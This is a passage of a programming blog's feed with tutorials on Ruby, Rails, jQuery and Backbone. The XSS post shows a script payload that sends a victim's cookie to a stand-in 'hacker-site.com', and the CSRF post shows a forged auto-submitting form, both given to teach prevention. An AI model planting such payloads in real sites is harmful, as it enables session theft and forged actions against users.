<code>puts</code>.</p><pre><code class="language-ruby">puts Path.new('world')</code></pre><p>However, in the following case just defining <code>to_s</code> will cause an error.
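</p><p>To make that concrete, here is a minimal sketch of my own (a hypothetical <code>MyPath</code>, not the actual Rails <code>Path</code> class). With only <code>to_s</code> defined, string concatenation raises a TypeError; adding <code>to_str</code> makes it work.</p><pre><code class="language-ruby">class MyPath
  def initialize(name)
    @name = name
  end

  def to_s
    @name
  end
end

begin
  'hello ' + MyPath.new('world')
rescue TypeError
  # to_s alone is not enough for implicit string conversion
end

class MyPath
  def to_str
    to_s
  end
end

'hello ' + MyPath.new('world') # 'hello world'</code></pre><p>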
Only by having <code>to_str</code> will the following case work.</p><pre><code class="language-ruby">puts 'hello ' + Path.new('world')</code></pre><p>So the difference between defining <code>to_s</code> and <code>to_str</code> is not just in what you see in the output.</p><h2>Conclusion</h2><p>If a class defines <code>to_str</code> then that class is telling the world: although my class is not <code>String</code>, you can treat me like a <code>String</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[jquery-ujs and jquery trigger]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-ujs-and-jquery-trigger"/>
      <updated>2012-05-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-ujs-and-jquery-trigger</id>
<content type="html"><![CDATA[<p>Let's see how to make an AJAX call using jQuery.</p><p>jQuery's ajax method's <code>success</code> callback function takes three parameters. Here is the <a href="http://api.jquery.com/jQuery.ajax/">api</a>.</p><pre><code class="language-javascript">success(data, textStatus, jqXHR);</code></pre><p>So if you are making an ajax call using jQuery the code might look like</p><pre><code class="language-javascript">$.ajax({
  url: &quot;ajax/test.html&quot;,
  success: function (data, textStatus, jqXHR) {
    console.log(data);
  },
});</code></pre><h2>ajax using jquery-ujs</h2><p>If you are using Rails and jquery-ujs then you might have code like this</p><pre><code class="language-plaintext">&lt;a href=&quot;/users/1&quot; data-remote=&quot;true&quot; data-type=&quot;json&quot;&gt;Show&lt;/a&gt;</code></pre><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;ajax:success&quot;, function (data, status, xhr) {
  alert(data.name);
});</code></pre><p>The above code will not work. In order to make it work, the very first argument passed to the callback must be an event object. Here is the code that will work.</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;ajax:success&quot;, function (event, data, status, xhr) {
  alert(data.name);
});</code></pre><p>Remember that the jQuery api says that the first parameter should be &quot;data&quot;, so why do we need to pass an event object to make it work?</p><h2>Why the event object is needed</h2><p>Here is a snippet from the jquery-ujs code</p><pre><code class="language-plaintext">success: function(data, status, xhr) {
  element.trigger('ajax:success', [data, status, xhr]);
}</code></pre><p>The thing about the <a href="http://api.jquery.com/trigger/">trigger</a> method is that the event object is always passed as the first parameter to the event handler. This is why, when you are using jquery-ujs, the first parameter of your callback function has to be an event object.</p>]]></content>
    </entry><entry>
       <title><![CDATA[XSS and Rails]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/xss-and-rails"/>
      <updated>2012-05-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/xss-and-rails</id>
<content type="html"><![CDATA[<p>XSS is <a href="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project">consistently a top</a> web application security risk as per <a href="https://www.owasp.org/index.php/Main_Page">The Open Web Application Security Project (OWASP)</a>.</p><p>An XSS vulnerability allows a hacker to <strong>execute JavaScript code</strong> that the hacker has put in.</p><p>Most web applications have a form. A user enters <code>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code> in the address field and hits submit. If the user sees a JavaScript alert then it means the user can execute the JavaScript code that they put in. It means the site has an XSS vulnerability.</p><p>Almost all modern web applications have some JavaScript code, and the application executes that JavaScript code. So running JavaScript code is not an issue. The issue is that in this case the hacker is able to put in JavaScript code and then run that code. No one should be allowed to put their own JavaScript code into the application.</p><p>If a hacker can execute JavaScript code then the hacker can see some other person's cookie. Later we will see how the hacker can do that.</p><p>If you are logged into an application then that application sets a cookie. That is how the application knows that you are logged in.</p><p>If a hacker can see someone else's cookie then the hacker can log in as that person by stealing the cookie.</p><p>Having SSL does not protect a site from XSS vulnerabilities.</p><p>XSS stands for <em>Cross-site scripting</em>. It is a very misleading name because XSS has absolutely nothing to do with <em>cross-site</em>. It has everything to do with a site, any site.</p><h2>A practical example</h2><p>It is very common to display an address in a formatted way.
Usually the code is something like this.</p><pre><code class="language-ruby">array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.join('&lt;br /&gt;')</code></pre><p>When the developer looks at the HTML page, the developer will see something like this.</p><p><img src="/blog_images/2012/xss-and-rails/xss1.png" alt="xss"></p><p>The <code>&lt;br /&gt;</code> tag is literally shown on the screen. The developer looks at the HTML markup rendered by Rails and it looks like this</p><p><img src="/blog_images/2012/xss-and-rails/xss2.png" alt="xss"></p><p>So the developer comes back to the code and marks the string <code>html_safe</code> as shown below.</p><pre><code class="language-ruby">array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.join('&lt;br /&gt;').html_safe</code></pre><p>Now the browser renders the address with a proper <code>&lt;br /&gt;</code> tag and the address looks nicely formatted as shown below.</p><p><img src="/blog_images/2012/xss-and-rails/xss3.png" alt="xss"></p><p>The developer is happy and moves on.</p><p>However, notice that the developer has marked user input data like <code>address1</code> as <code>html_safe</code>, and that's dangerous.</p><h2>Hacker in action</h2><p>The application has a number of users and everything is running smoothly. All the users are seeing properly formatted addresses. And then one day a hacker tries to hack the site.
The hacker puts in address1 as <code>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code>.</p><p>Now the hacker will see a JavaScript alert which might look like this.</p><p><img src="/blog_images/2012/xss-and-rails/xss4.png" alt="xss"></p><p>If we look at the HTML markup then it might look like this.</p><pre><code class="language-plaintext">John Smith&lt;br /&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;br /&gt;Suite #110&lt;br /&gt;Miami&lt;br /&gt;FL&lt;br /&gt;33027&lt;br /&gt;USA</code></pre><p>The hacker put in a <code>&lt;script&gt;</code> tag and the application sent that code to the browser. The browser did its job. It executed the JavaScript code and in the process the hacker is able to see the cookie.</p><h2>How would a hacker steal someone else's information?</h2><p>Let's say that an application has a comment form. In the comment form the hacker puts in the following comment.</p><p>&lt;script&gt;window.location='http://hacker-site.com?cookie='+document.cookie&lt;/script&gt;</p><p>The next day another user, Mary, comes to the site and logs in. She is reading the same post, and that post has a lot of comments, one of which is the comment posted by the hacker.</p><p>The application loads all the comments, including the comment posted by the hacker.</p><p>When the browser sees JavaScript code it executes it. And now Mary's cookie information has been sent to hacker-site and Mary is not even aware of it.</p><p>This is a classic case of an XSS attack, and this is how the hacker can next time log in as Mary just by using her cookie information.</p><h2>Fixing XSS</h2><p>Now that we know how a hacker might be able to execute JavaScript code in our application, the question is how do we prevent it.</p><p>Well, there is only one way to prevent it. And that is: <strong>do not send the <code>&lt;script&gt;</code> tag to the browser</strong>.
If we send a <code>&lt;script&gt;</code> tag to the browser then the browser will execute that JavaScript.</p><p>So what can we do so that the <code>&lt;script&gt;</code> tag is not sent to the browser?</p><h2>Rails default behavior is to keep things secure</h2><p>Before we start looking at solutions, let's revisit what happened earlier when we did not mark the content as <code>html_safe</code>. So let's remove <code>html_safe</code> and try to see the content posted by the hacker.</p><p>The code without <code>html_safe</code> would look like this.</p><pre><code class="language-ruby">array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.join('&lt;br /&gt;')</code></pre><p>And if we execute this code then the hacker's address would look like this.</p><pre><code class="language-plaintext">John Smith&lt;br /&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;br /&gt;Suite #110&lt;br /&gt;Miami&lt;br /&gt;FL&lt;br /&gt;33027&lt;br /&gt;USA</code></pre><p>Notice that in this case no JavaScript alert was seen. The hacker gets to see the address the hacker had posted. Why is that? To answer that, let's look at the HTML markup.</p><pre><code class="language-plaintext">John Smith&amp;lt;br /&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&amp;lt;br /&amp;gt;Suite #110&amp;lt;br /&amp;gt;Miami&amp;lt;br /&amp;gt;FL&amp;lt;br /&amp;gt;33027&amp;lt;br /&amp;gt;USA</code></pre><p>As we can see, Rails did not render the address exactly as it was posted by the hacker.
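</p><p>We can observe this escaping in plain Ruby, outside of any Rails view, using <code>ERB::Util.html_escape</code>. This standalone snippet is my own illustration.</p><pre><code class="language-ruby">require 'erb'

ERB::Util.html_escape('&lt;script&gt;alert(document.cookie)&lt;/script&gt;')
#=&gt; &quot;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&quot;</code></pre><p>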
Rails did something because of which <code>&lt;script&gt;</code> turned into <code>&amp;lt;script&amp;gt;</code>.</p><p>Rails HTML-escaped the content by using the method <a href="https://github.com/rails/rails/blob/72ffeb9fe58c46bd556a85bed5214d8f482737a5/activesupport/lib/active_support/core_ext/string/output_safety.rb#L21">html_escape</a>.</p><p>By default Rails assumes that all content is not safe and thus Rails subjects all content to the <code>html_escape</code> method.</p><p>The problem is that here we are trying to format the content using <code>&lt;br /&gt;</code> and Rails is escaping that also. We need to escape only the user content and not escape <code>&lt;br /&gt;</code>. Here is how we can do that.</p><pre><code class="language-ruby">array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.map { |i| ERB::Util.html_escape(i) }.join('&lt;br /&gt;').html_safe</code></pre><p>In the above case we are marking the content as <code>html_safe</code> because we passed the content through <code>html_escape</code> and now we are sure that no unescaped user content can go through.</p><p>This will show the address in the browser like this.</p><p><img src="/blog_images/2012/xss-and-rails/xss5.png" alt="xss"></p><p>The above solution worked. <code>&lt;br /&gt;</code> is not escaped and the user input was properly escaped.</p><h2>Another solution using content_tag</h2><p>In the above case we used <code>html_escape</code> and it worked. However, if we need to add, say, a <code>&lt;strong&gt;</code> tag then adding the opening tag and then the closing tag could be quite cumbersome.
For such cases we can use <a href="https://github.com/rails/rails/blob/861b70e92f4a1fc0e465ffcf2ee62680519c8f6f/actionview/lib/action_view/helpers/tag_helper.rb#L103">content_tag</a>.</p><p>By default <code>content_tag</code> escapes the input text.</p><pre><code class="language-ruby">array = [name, address1, address2, city_name, state_name, zip, country_name]
array.compact.map { |i| ActionController::Base.helpers.content_tag(:strong, i) }.join('').html_safe</code></pre><h2>simple_format for simple formatting</h2><p>If you want to format the text a little bit then you can use <a href="http://api.rubyonrails.org/classes/ActionView/Helpers/TextHelper.html#method-i-simple_format">simple_format</a>. If a user enters a bunch of text in a text area then simple_format can help make the text look pretty without compromising security. It will strip away <code>&lt;script&gt;</code> and other security-sensitive tags. <code>simple_format</code> internally uses the <a href="https://github.com/rails/rails/blob/master/actionview/lib/action_view/helpers/sanitize_helper.rb">sanitize</a> method. Note that <code>simple_format</code> will remove the <code>script</code> tag, while solutions like <code>html_escape</code> will preserve the <code>script</code> tag in escaped form.</p><h2>Handling JSON data</h2><p>We use <a href="https://github.com/rails/jbuilder">jbuilder</a> and the view looks like this.</p><pre><code class="language-plaintext">json.user do
  json.name @user.name
  json.address1 @user.address1
  json.address2 @user.address2
  json.city_name @user.city_name
  json.state_name @user.state_name
  json.zip @user.zip
  json.country_name @user.country_name
end</code></pre><p>This will produce a JSON structure as shown below.</p><p><img src="/blog_images/2012/xss-and-rails/xss6.png" alt="xss"></p><p>On the client side there is JavaScript code to display the content. <code>$('body').append(data.about)</code> does the job.
Well, when that content is added to the DOM the browser will execute the JavaScript code, and now we are back to the same problem.</p><p>There are two ways we can handle this problem. We can send the data as it is in JSON format. Then it is the responsibility of the client-side JavaScript code to append the data in such a way that HTML tags like <code>script</code> are not executed.</p><p>jQuery provides the <a href="http://api.jquery.com/text/">text(input)</a> method, which escapes the input value. Here is an example.</p><p><img src="/blog_images/2012/xss-and-rails/text.png" alt="jquery text"></p><p>In this case the entire responsibility of escaping the content rests on JavaScript. While using the data, the JavaScript code constantly needs to be aware of which content is user input that must be escaped and which content is not user input.</p><p>That is why we favor the solution where the JSON content is escaped to begin with. For escaping the content we can use the <code>h</code> or <code>html_escape</code> helper method.</p><pre><code class="language-plaintext">json.user do
  json.name h(@user.name)
  json.address1 h(@user.address1)
  json.address2 h(@user.address2)
  json.city_name h(@user.city_name)
  json.state_name h(@user.state_name)
  json.zip h(@user.zip)
  json.country_name h(@user.country_name)
end</code></pre><p><img src="/blog_images/2012/xss-and-rails/xss7.png" alt="xss"></p><p>As you can see, the user content is escaped. Now this data can be sent to the client side and we do not need to worry about the <code>script</code> tag being executed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[CSRF and Rails]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/csrf-and-rails"/>
      <updated>2012-05-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/csrf-and-rails</id>
<content type="html"><![CDATA[<p>CSRF stands for <strong>Cross-site request forgery</strong>. It is a technique hackers use to hack into a web application.</p><p>Unlike <a href="xss-and-rails">XSS</a>, CSRF does not try to steal your information to log into the system. CSRF assumes that you are already logged in at your site, and when you visit, say, the comments section of some other site, an attack is made on your site without you knowing it.</p><p>Here is how it might work.</p><ul><li>You log in at www.mysite.com .</li><li>Now you open a new tab and visit www.gardening.com since you are interested in gardening.</li><li>You are browsing the comments posted on the gardening.com forum. One of the posted comments contains markup like this: <code>&lt;img src=&quot;http://www.mysite.com/grant_access?user_id=1&amp;project_id=123&quot; /&gt;</code></li><li>Now if you are the admin of project &quot;123&quot; on www.mysite.com then you have unknowingly granted admin access to user 1. And you did not even know that you did it.</li></ul><p>I know you are thinking that loading an image will make a <code>GET</code> request and granting access is hidden behind a <code>POST</code> request, so you are safe. Well, the hacker can easily change the code to make a <code>POST</code> request. In that case the code might look like this</p><pre><code class="language-html">&lt;script&gt;
  var url = &quot;http://mysite.com/grant_access?user_id=1&amp;project_id=123&quot;;
  document.write(&quot;&lt;form name=hack method=post action=&quot; + url + &quot;&gt;&lt;/form&gt;&quot;);
&lt;/script&gt;
&lt;img src=&quot;&quot; onLoad=&quot;document.hack.submit()&quot; /&gt;</code></pre><p>Now when the image is loaded a <code>POST</code> request is sent to the server and the application might grant access to this new user.
Not good.</p><h2>Prevention</h2><p>In order to prevent such things from happening, Rails uses an <code>authenticity_token</code>.</p><p>If you look at the source code of any form generated by Rails you will see that the form contains the following code</p><pre><code class="language-plaintext">&lt;input name=&quot;authenticity_token&quot;
       type=&quot;hidden&quot;
       value=&quot;LhT7dqqRByvOhJJ56BsPb7jJ2p24hxNu6ZuJA+8l+YA=&quot; /&gt;</code></pre><p>The exact value of the authenticity_token will be different for you. When the form is submitted the authenticity_token is submitted with it, and <a href="https://github.com/rails/rails/blob/6843cf6a94ae1efad0464381408a1c5f2f157376/actionpack/lib/action_controller/metal/request_forgery_protection.rb">Rails checks</a> the <code>authenticity_token</code>; only when it is verified is the request passed along for further processing.</p><p>In a brand new Rails application the <code>application_controller.rb</code> has only one line.</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base
  protect_from_forgery
end</code></pre><p>That line, <code>protect_from_forgery</code>, checks the authenticity of the incoming request.</p><p>Here is the code that is responsible for generating the <code>csrf_token</code>.</p><pre><code class="language-ruby"># Sets the token value for the current session.
def form_authenticity_token
  session[:_csrf_token] ||= SecureRandom.base64(32)
end</code></pre><p>Since this <code>csrf_token</code> is a random value, there is no way for a hacker to know what the &quot;csrf_token&quot; is for my session. And the hacker will not be able to pass the correct &quot;authenticity_token&quot;.</p><p>Do keep in mind that this protection is applied only to <code>POST</code>, <code>PUT</code> and <code>DELETE</code> requests by Rails.
Rails' position is that <code>GET</code> requests should not be changing the database in the first place, so there is no need to check the authenticity of the token for them.</p><h2>Update for Rails 4</h2><p>If you generate a brand new Rails application using Rails 4 then the <code>application_controller.rb</code> would look like this</p><pre><code class="language-ruby">class ApplicationController &lt; ActionController::Base
  # Prevent CSRF attacks by raising an exception.
  # For APIs, you may want to use :null_session instead.
  protect_from_forgery with: :exception
end</code></pre><p>Now the default is to raise an exception if the token does not match. API calls will not have the token, so if the application is expecting API calls the strategy should be changed from <code>:exception</code> to <code>:null_session</code>.</p><p>Note that if the site is vulnerable to XSS then the hacker can submit a request as if they are logged in, and in that case the CSRF attack will go through.</p>]]></content>
    </entry><entry>
       <title><![CDATA[tsort in ruby and rails initializers]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/tsort-in-ruby"/>
      <updated>2012-03-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/tsort-in-ruby</id>
<content type="html"><![CDATA[<p>You have been assigned the task of figuring out in what order the following tasks should be executed, given their dependencies on other tasks.</p><pre><code class="language-plaintext">Task11 takes input from task5 and task7.
Task10 takes input from task11 and task3.
Task9 takes input from task8 and task11.
Task8 takes input from task3 and task7.
Task2 takes input from task11.</code></pre><p>If you look at these tasks and draw a graph then it might look like this.</p><p><img src="/blog_images/2012/tsort-in-ruby/directed_acyclic_graph.png" alt="directed acyclic graph"></p><h2>Directed acyclic graph</h2><p>The graph shown above is a &quot;directed acyclic graph&quot;. In a directed acyclic graph, if you start following the arrows then you should never be able to get back to the node from where you started.</p><p>Directed acyclic graphs are great at describing problems where a task is dependent on another set of tasks.</p><p>We started off with a set of tasks that are dependent on other tasks. To get the solution we need to sort the tasks in such a way that the first task is not dependent on any task and each next task depends only on tasks previously done.
So basically we need to sort the directed acyclic graph such that the prerequisites are done before getting to the next task.</p><p>Sorting a directed acyclic graph in the manner described above is called <em>topological sorting</em>.</p><h3>TSort</h3><p>Ruby provides <a href="http://www.ruby-doc.org/stdlib-1.9.3/libdoc/tsort/rdoc/TSort.html">TSort</a>, which allows us to implement &quot;topological sorting&quot;. <a href="https://github.com/ruby/ruby/blob/master/lib/tsort.rb">Here is the source code of tsort</a>.</p><p>Let's write code to find a solution to the original problem.</p><pre><code class="language-ruby">require &quot;tsort&quot;

class Project
  include TSort

  def initialize
    @requirements = Hash.new { |h, k| h[k] = [] }
  end

  def add_requirement(name, *requirement_dependencies)
    @requirements[name] = requirement_dependencies
  end

  def tsort_each_node(&amp;block)
    @requirements.each_key(&amp;block)
  end

  def tsort_each_child(name, &amp;block)
    @requirements[name].each(&amp;block) if @requirements.has_key?(name)
  end
end

p = Project.new
p.add_requirement(:r2, :r11)
p.add_requirement(:r8, :r3, :r7)
p.add_requirement(:r9, :r8, :r11)
p.add_requirement(:r10, :r3, :r11)
p.add_requirement(:r11, :r7, :r5)

puts p.tsort</code></pre><p>If I execute the above code in <code>ruby 1.9.2</code> I get the following result.</p><pre><code class="language-plaintext">r7
r5
r11
r2
r3
r8
r9
r10</code></pre><p>So that is the order in which the tasks should be executed.</p><h2>How TSort works</h2><p><code>tsort</code> requires that the following two methods be implemented.</p><p><code>#tsort_each_node</code> - as the name suggests, it is used to iterate over all the nodes in the graph. In the above example all the requirements are stored as hash keys. So to iterate over all the nodes we need to go through all the hash keys. And that can be done using the <code>#each_key</code> method of the hash.</p><p><code>#tsort_each_child</code> - this method is used to iterate over all the child nodes of the given node.
Since this is a directed acyclic graph, all the child nodes are the dependencies. We stored all the dependencies of a project as an array. So to get the list of all the dependencies for a node, all we need to do is <code>@requirements[name].each</code>.</p><h2>Another example</h2><p>To make things clearer, let's try to solve the same problem in a different way.</p><pre><code class="language-ruby">require &quot;tsort&quot;

class Project
  attr_accessor :dependents, :name

  def initialize(name)
    @name = name
    @dependents = []
  end
end

class Sorter
  include TSort

  def initialize(col)
    @col = col
  end

  def tsort_each_node(&amp;block)
    @col.each(&amp;block)
  end

  def tsort_each_child(project, &amp;block)
    @col.select { |i| i.name == project.name }.first.dependents.each(&amp;block)
  end
end

r2  = Project.new :r2
r3  = Project.new :r3
r5  = Project.new :r5
r7  = Project.new :r7
r8  = Project.new :r8
r9  = Project.new :r9
r10 = Project.new :r10
r11 = Project.new :r11

r2.dependents &lt;&lt; r11
r8.dependents &lt;&lt; r3
r8.dependents &lt;&lt; r7
r9.dependents &lt;&lt; r8
r9.dependents &lt;&lt; r11
r10.dependents &lt;&lt; r3
r10.dependents &lt;&lt; r11
r11.dependents &lt;&lt; r7
r11.dependents &lt;&lt; r5

col = [r2, r3, r5, r7, r8, r9, r10, r11]
result = Sorter.new(col).tsort
puts result.map(&amp;:name).inspect</code></pre><p>When I execute the above code this is the result I get.</p><pre><code class="language-plaintext">[:r7, :r5, :r11, :r2, :r3, :r8, :r9, :r10]</code></pre><p>If you look at the code, I am doing exactly the same thing here as in the first case.</p><h2>Using before and after option</h2><p>Let's try to solve the same problem one last time using the <code>before</code> and <code>after</code> options. 
Here is the code.</p><pre><code class="language-ruby">require &quot;tsort&quot;

class Project
  attr_accessor :before, :after, :name

  def initialize(name, options = {})
    @name = name
    @before, @after = options[:before], options[:after]
  end
end

class Sorter
  include TSort

  def initialize(col)
    @col = col
  end

  def tsort_each_node(&amp;block)
    @col.each(&amp;block)
  end

  def tsort_each_child(project, &amp;block)
    @col.select { |i| i.before == project.name || i.name == project.after }.each(&amp;block)
  end
end

r2  = Project.new :r2, after: :r11
r3  = Project.new :r3, before: :r8
r5  = Project.new :r5, before: :r11
r7  = Project.new :r7, before: :r11
r8  = Project.new :r8, after: :r7, before: :r9
r9  = Project.new :r9, after: :r11
r10 = Project.new :r10, after: :r3
r11 = Project.new :r11, before: :r10

col = [r5, r2, r11, r3, r10, r9, r7, r8]
result = Sorter.new(col).tsort
puts result.map(&amp;:name).inspect</code></pre><p>Here is the result.</p><pre><code class="language-ruby">[:r5, :r7, :r11, :r2, :r3, :r10, :r8, :r9]</code></pre><h2>Sorting of rails initializer</h2><p>If you have written a Rails plugin then you can use code like this.</p><pre><code class="language-ruby">initializer 'my_plugin_initializer',
  after: 'to_prepare', before: 'before_eager_load' do |app|
  ....
end</code></pre><p>The way Rails figures out the exact order in which initializers should be executed is exactly the same as illustrated above. Here is the code from Rails.</p><pre><code class="language-ruby">alias :tsort_each_node :each

def tsort_each_child(initializer, &amp;block)
  select { |i| i.before == initializer.name || i.name == initializer.after }.each(&amp;block)
end

...

initializers.tsort.each do |initializer|
  initializer.run(*args) if initializer.belongs_to?(group)
end</code></pre><p>When Rails boots it invokes a lot of initializers. 
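</p><p>Those two methods can be exercised outside of a full Rails boot. Here is a hypothetical miniature modeled on the Rails snippet above; the <code>Initializer</code> struct and all the initializer names are invented for illustration.</p>

```ruby
require "tsort"

# A hypothetical miniature of Rails' initializer collection; the
# tsort_each_child logic mirrors the Rails snippet shown above.
Initializer = Struct.new(:name, :before, :after)

class Initializers < Array
  include TSort

  alias tsort_each_node each

  def tsort_each_child(initializer, &block)
    select { |i| i.before == initializer.name || i.name == initializer.after }.each(&block)
  end
end

list = Initializers.new
list << Initializer.new(:load_config)
list << Initializer.new(:connect_db, nil, :load_config)  # runs after :load_config
list << Initializer.new(:check_env, :load_config)        # runs before :load_config

p list.tsort.map(&:name) # => [:check_env, :load_config, :connect_db]
```

<p>In the real boot process the collection is much larger, but the mechanics are the same. 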
Rails uses tsort to get the order in which the initializers should be invoked. <a href="https://gist.github.com/2051633">Here is the list</a> of unsorted initializers. After sorting, the initializers list is <a href="https://gist.github.com/2051649">this</a>.</p><h2>Where else it is used</h2><p><a href="http://gembundler.com/">Bundler</a> uses tsort to find the order in which gems should be installed.</p><p>Tsort can also be used to statically analyze programming code by looking at the method dependency graph.</p><p>Image source: <a href="http://en.wikipedia.org/wiki/Directed_acyclic_graph">http://en.wikipedia.org/wiki/Directed_acyclic_graph</a></p>]]></content>
    </entry><entry>
       <title><![CDATA[alias vs alias_method]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/alias-vs-alias-method"/>
      <updated>2012-01-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/alias-vs-alias-method</id>
      <content type="html"><![CDATA[<p>It comes up very often: should I use <code>alias</code> or <code>alias_method</code>? Let's take a look at them in a bit of detail.</p><h2>Usage of alias</h2><pre><code class="language-ruby">class User
  def full_name
    puts &quot;Johnnie Walker&quot;
  end

  alias name full_name
end

User.new.name #=&gt; Johnnie Walker</code></pre><h2>Usage of alias_method</h2><pre><code class="language-ruby">class User
  def full_name
    puts &quot;Johnnie Walker&quot;
  end

  alias_method :name, :full_name
end

User.new.name #=&gt; Johnnie Walker</code></pre><p>The first difference you will notice is that in the case of <code>alias_method</code> we need to use a comma between the &quot;new method name&quot; and the &quot;old method name&quot;.</p><p><code>alias_method</code> takes both symbols and strings as input. The following code would also work.</p><pre><code class="language-ruby">alias_method 'name', 'full_name'</code></pre><p>That was easy. Now let's take a look at how scoping impacts the usage of <code>alias</code> and <code>alias_method</code>.</p><h2>Scoping with alias and alias_method</h2><pre><code class="language-ruby">class User
  def full_name
    puts &quot;Johnnie Walker&quot;
  end

  def self.add_rename
    alias_method :name, :full_name
  end
end

class Developer &lt; User
  def full_name
    puts &quot;Geeky geek&quot;
  end

  add_rename
end

Developer.new.name #=&gt; 'Geeky geek'</code></pre><p>In the above case the method &quot;name&quot; picks the method &quot;full_name&quot; defined in the &quot;Developer&quot; class. 
Now let's try with <code>alias</code>.</p><pre><code class="language-ruby">class User
  def full_name
    puts &quot;Johnnie Walker&quot;
  end

  def self.add_rename
    alias :name :full_name
  end
end

class Developer &lt; User
  def full_name
    puts &quot;Geeky geek&quot;
  end

  add_rename
end

Developer.new.name #=&gt; 'Johnnie Walker'</code></pre><p>With the usage of <code>alias</code> the method &quot;name&quot; is not able to pick the method &quot;full_name&quot; defined in <code>Developer</code>.</p><p>This is because <code>alias</code> is a keyword and it is lexically scoped. It treats <code>self</code> as the value of <code>self</code> at the time the source code was read. In contrast, <code>alias_method</code> treats <code>self</code> as the value determined at run time.</p><p>Overall my recommendation would be to use <code>alias_method</code>. Since <code>alias_method</code> is a method defined in class <code>Module</code>, it can be overridden later and it offers more flexibility.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding bind and bindAll in Backbone.js]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-bind-and-bindall-in-backbone"/>
      <updated>2011-08-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-bind-and-bindall-in-backbone</id>
      <content type="html"><![CDATA[<p><a href="https://github.com/jashkenas/backbone/">Backbone.js</a> users use the <a href="https://underscorejs.org/#bind">bind</a> and <a href="https://underscorejs.org/#bindAll">bindAll</a> methods provided by <a href="https://github.com/jashkenas/underscore">underscore.js</a> a lot. In this blog I am going to discuss why these methods are needed and how it all works.</p><h2>It all starts with apply</h2><p>Function <code>bindAll</code> internally uses <code>bind</code>, and <code>bind</code> internally uses <code>apply</code>. So it is important to understand what <code>apply</code> does.</p><pre><code class="language-javascript">var func = function beautiful() {
  alert(this + &quot; is beautiful&quot;);
};

func();</code></pre><p>If I execute the above code then I get <code>[object window] is beautiful</code>. I am getting that message because when the function is invoked, <code>this</code> is <code>window</code>, the default global object.</p><p>In order to change the value of <code>this</code> we can make use of the method <code>apply</code> as given below.</p><pre><code class="language-javascript">var func = function beautiful() {
  alert(this + &quot; is beautiful&quot;);
};

func.apply(&quot;Internet&quot;);</code></pre><p>In the above case the alert message will be <code>Internet is beautiful</code>. 
Similarly, the following code will produce <code>Beach is beautiful</code>.</p><pre><code class="language-javascript">var func = function beautiful() {
  alert(this + &quot; is beautiful&quot;);
};

func.apply(&quot;Beach&quot;); // Beach is beautiful</code></pre><p>In short, <code>apply</code> lets us control the value of <code>this</code> when the function is invoked.</p><h2>Why bind is needed</h2><p>In order to understand why the <code>bind</code> method is needed, first let's look at the following example.</p><pre><code class="language-javascript">function Developer(skill) {
  this.skill = skill;
  this.says = function () {
    alert(this.skill + &quot; rocks!&quot;);
  };
}

var john = new Developer(&quot;Ruby&quot;);
john.says(); // Ruby rocks!</code></pre><p>The above example is pretty straightforward. <code>john</code> is an instance of <code>Developer</code>, and when the <code>says</code> function is invoked we get the right alert message.</p><p>Notice that when we invoked <code>says</code> we invoked it like this: <code>john.says()</code>. If we just want to get hold of the function stored in <code>says</code> then we need to write <code>john.says</code>. So the above code could be broken down into the following code.</p><pre><code class="language-javascript">function Developer(skill) {
  this.skill = skill;
  this.says = function () {
    alert(this.skill + &quot; rocks!&quot;);
  };
}

var john = new Developer(&quot;Ruby&quot;);
var func = john.says;
func(); // undefined rocks!</code></pre><p>This code is similar to the code above it. All we have done is store the function in a variable called <code>func</code>. If we invoke this function then we should get the alert message we expected. However, if we run this code then the alert message will be <code>undefined rocks!</code>.</p><p>We are getting <code>undefined rocks!</code> because in this case <code>func</code> is being invoked in the global context. 
<code>this</code> is pointing to the global object called <code>window</code> when the function is executed. And <code>window</code> does not have any attribute called <code>skill</code>. Hence the output of <code>this.skill</code> is <code>undefined</code>.</p><p>Earlier we saw that using <code>apply</code> we can fix the problem arising out of <code>this</code>. So let's try to use <code>apply</code> to fix it.</p><pre><code class="language-javascript">function Developer(skill) {
  this.skill = skill;
  this.says = function () {
    alert(this.skill + &quot; rocks!&quot;);
  };
}

var john = new Developer(&quot;Ruby&quot;);
var func = john.says;
func.apply(john);</code></pre><p>The above code fixes our problem. This time the alert message we got was <code>Ruby rocks!</code>. However there is an issue, and it is a big one.</p><p>In the JavaScript world functions are first class citizens. The reason why we create a function is so that we can easily pass it around. In the above case we created a function called <code>func</code>. However, along with the function <code>func</code> we now need to keep passing <code>john</code> around. That is not a good thing. Secondly, the responsibility of rightly invoking this function has been shifted from the function creator to the function consumer. That's not a good API.</p><p>We should try to create functions which can easily be called by the consumers of the function. 
This is where <code>bind</code> comes in.</p><h2>How bind solves the problem</h2><p>First let's see how using <code>bind</code> solves the problem.</p><pre><code class="language-javascript">function Developer(skill) {
  this.skill = skill;
